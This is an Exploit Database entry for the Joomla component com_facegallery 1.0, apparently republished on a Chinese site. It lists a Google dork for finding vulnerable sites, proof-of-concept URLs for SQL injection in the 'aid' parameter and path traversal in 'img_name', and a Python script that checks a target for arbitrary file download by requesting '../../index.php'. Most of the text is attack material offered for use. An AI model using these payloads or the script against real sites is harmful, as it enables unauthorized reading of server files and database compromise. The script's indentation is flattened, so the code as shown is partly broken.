Joomla! Component com_facegallery 1.0 – Multiple Vulnerabilities

• Exploit Database
• 12 阅读

• 作者： Claudio Viviani
  日期： 2014-09-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/34754/

• ######################
  
  # Exploit Title : Joomla Face Gallery 1.0 Multiple Vulnerabilities
  
  # Exploit Author : Claudio Viviani
  
  # Vendor Homepage : https://www.apptha.com
  
  # Software Link : https://www.apptha.com/downloadable/download/sample/sample_id/150
  
  # Dork Google: inurl:option=com_facegallery
  
  # Date : 2014-09-17
  
  # Tested on : Windows 7 / Mozilla Firefox
  # Linux / Mozilla Firefox
  
  # Info:
  
  # Joomla Face Gallery 1.0 suffers from SQL injection and Arbitrary file dowwnload vulnerabilities
  
  # PoC Exploit:
  #
  # http://localhost/index.php?option=com_facegallery&view=images&aid=[SQLi]&lang=en
  # http://localhost/index.php?option=com_facegallery&task=imageDownload&img_name=[../../filename]
  
  # "aid" and img_name variables are not sanitized.
  
  ######################
  
  # Arbitrary file download exploit:
  
  #!/usr/bin/env python
  
  # http connection
  import urllib, urllib2
  # Args management
  import optparse
  # Error managemen
  import sys
  
  banner = """
   ____ _______
  |__.-----.-----.--------|.---.-. | _ .---.-.----.-----.
  ||_|_|||_| |.1___|_|__|-__|
  ||_____|_____|__|__|__|__|___._| |.__) |___._|____|_____|
   |___| |:|
   |::.|
   `---'
  _______ __ ______________
   | _ .---.-||.-----.----.--.--. | _ || _ |
   |.|___|_|||-__| _||| |.| |__|.| |
   |.| |___._|__|__|_____|__| |___| `-|.|__|.| |
   |:1 ||_____| |:||:1 |
   |::.. . ||::.||::.. . |
   `-------'`---'`-------'
  
   j00ml4 F4c3 G4ll3ry 4rb1tr4ry F1l3 D0wnl04d
  
  Written by:
  
  Claudio Viviani
  
   http://www.homelab.it
  
  info@homelab.it
  homelabit@protonmail.ch
  
   https://www.facebook.com/homelabit
  https://twitter.com/homelabit
   https://plus.google.com/+HomelabIt1/
   https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
  """
  
  # Check url
  def checkurl(url):
  if url[:8] != "https://" and url[:7] != "http://":
  print('[X] You must insert http:// or https:// procotol')
  sys.exit(1)
  else:
  return url
  
  def connection(url,pathtrav):
  try:
  response = urllib2.urlopen(url+'/index.php?option=com_facegallery&task=imageDownload&img_name='+pathtrav+'index.php')
  content = response.read()
  if content != "":
  print '[!] VULNERABLE'
  print '[+] '+url+'/index.php?option=com_facegallery&task=imageDownload&img_name='+pathtrav+'index.php'
  else:
  print '[X] Not Vulnerable'
  except urllib2.HTTPError:
  print '[X] HTTP Error'
  except urllib2.URLError:
  print '[X] Connection Error'
  
  commandList = optparse.OptionParser('usage: %prog -t URL')
  commandList.add_option('-t', '--target', action="store",
  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
  )
  options, remainder = commandList.parse_args()
  
  # Check args
  if not options.target:
  print(banner)
  commandList.print_help()
  sys.exit(1)
  
  print(banner)
  
  url = checkurl(options.target)
  pathtrav = "../../"
  
  connection(url,pathtrav)